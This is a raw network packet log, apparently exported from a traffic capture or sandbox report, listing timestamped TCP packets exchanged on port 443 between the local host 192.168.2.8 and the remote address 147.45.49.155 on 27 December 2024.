                                                                        Dec 27, 2024 09:05:23.652615070 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.706223965 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.706248045 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.706353903 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.706363916 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.706408978 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.760103941 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.760124922 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.760241985 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.760251999 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.760307074 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.760329962 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.843128920 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.843158007 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.843254089 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.843269110 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.843301058 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.881993055 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.882018089 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.882077932 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.882086992 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.882141113 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.908235073 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.908260107 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.908324957 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.908338070 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.908381939 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.926300049 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.926325083 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.926397085 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.926417112 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.926460028 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.944238901 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.944263935 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.944350004 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.944360971 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.944410086 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.048939943 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.048964977 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.049029112 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.049037933 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.049097061 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.061142921 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.061167955 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.061254978 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.061268091 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.061300993 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.061319113 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.073342085 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.073364973 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.073426008 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.073432922 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.073510885 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.085191965 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.085216999 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.085268021 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.085274935 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.085345984 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.095454931 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.095485926 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.095535040 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.095545053 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.095577002 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.095592022 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:24.107923985 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:24.107949018 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.092926025 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.092978001 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.092989922 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.093020916 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.093036890 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.097788095 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.097804070 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.097856998 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.097868919 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.097893953 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.097913980 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.103271008 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.103288889 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.103338003 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.103351116 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.103404999 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.108541965 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.108556032 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.108612061 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.108628988 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.108668089 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.113698959 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.113713980 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.113766909 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.113775969 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.113831043 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.119178057 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.119199991 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.119277000 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.119290113 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.119326115 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.206681967 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.206705093 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.206753016 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.206765890 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.206793070 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.206813097 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.280105114 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.280131102 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.280172110 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.280189037 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.280205011 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.280225992 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.284852982 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.284869909 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.284929991 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.284944057 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.284980059 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.290224075 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.290239096 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.290287971 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.290301085 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.290324926 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.290340900 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.295691967 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.295711040 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.295753002 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.295766115 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.295797110 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.295820951 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.300506115 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.300522089 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.300581932 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.300597906 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.300632954 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.306274891 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.306293011 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.306340933 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.306354046 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.306382895 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.306396961 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.311146021 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.311161995 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.311220884 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.311233997 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.311285019 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.399441957 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.399461985 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.399512053 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.399523973 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.399549007 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.399566889 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.471654892 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.471673965 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.471752882 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.471771002 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.471812963 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.476993084 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.477013111 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.477087975 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.477094889 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.477149963 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.482484102 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.482501030 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.482552052 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.482559919 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.482601881 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.487277031 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.487293005 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.487339020 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.487346888 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.487379074 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.492659092 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.492681026 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.492731094 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.492737055 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.492773056 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.497854948 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.497870922 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.497924089 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.497930050 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.497978926 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.503221035 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.503237963 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.503298998 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.503308058 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.503412962 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.591481924 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.591520071 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.591576099 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.591604948 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.591634989 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.591650009 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.663894892 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.663968086 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.664026976 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.664057016 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.664086103 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.664107084 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.669198036 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.669253111 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.669296980 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.669307947 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.669337034 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.669351101 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.674612999 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.674668074 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.674700022 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.674706936 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.674741983 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.674761057 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.679383039 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.679411888 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.679497004 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.679507017 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.679529905 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.679543018 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.684814930 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.684834003 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.684916973 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.684925079 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.685004950 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.689905882 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.689925909 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.689971924 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.689980030 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.690011024 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.690040112 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.690660000 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.690701962 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.690706968 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.690740108 CET44349711147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:28.690783978 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:28.691214085 CET49711443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:31.881748915 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:31.881800890 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:31.881876945 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:31.891845942 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:31.891863108 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:33.454768896 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:33.454866886 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:33.513850927 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:33.513870001 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:33.514203072 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:33.525456905 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:33.571321964 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.077280045 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.143306017 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.278429985 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278445959 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278461933 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278469086 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278495073 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.278497934 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278521061 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.278537035 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.278559923 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.331326008 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.331357002 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.331407070 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.331429958 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.331448078 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.331569910 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.479726076 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.479754925 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.479845047 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.479881048 CET44349722147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:34.479895115 CET49722443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:34.480328083 CET49722443192.168.2.8147.45.49.155
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:05:34.510844946 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.510874033 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.510934114 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.510960102 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.510974884 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.511178970 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.542645931 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.542665958 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.542748928 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.542774916 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.542820930 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.572468042 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.572503090 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.572549105 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.572570086 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.572590113 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.572608948 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.683881998 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.683907032 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.683969021 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.683995962 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.684010029 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.684317112 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.706001043 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.706020117 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.706077099 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.706093073 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.708328962 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.722445965 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.722465992 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.722517967 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.722544909 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.722558022 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.724320889 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.735356092 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.735378981 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.735439062 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.735450029 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.735469103 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.735480070 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.796269894 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.796293974 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.796384096 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.796418905 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.798228979 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.808491945 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.808511019 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.808564901 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.808574915 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.808618069 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.878921032 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.878951073 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.879143000 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.879143953 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.879172087 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.879220009 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
Dec 27, 2024 09:05:34.890364885 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.890383005 CET | 443 | 49722 | 147.45.49.155 | 192.168.2.8
Dec 27, 2024 09:05:34.890467882 CET | 49722 | 443 | 192.168.2.8 | 147.45.49.155
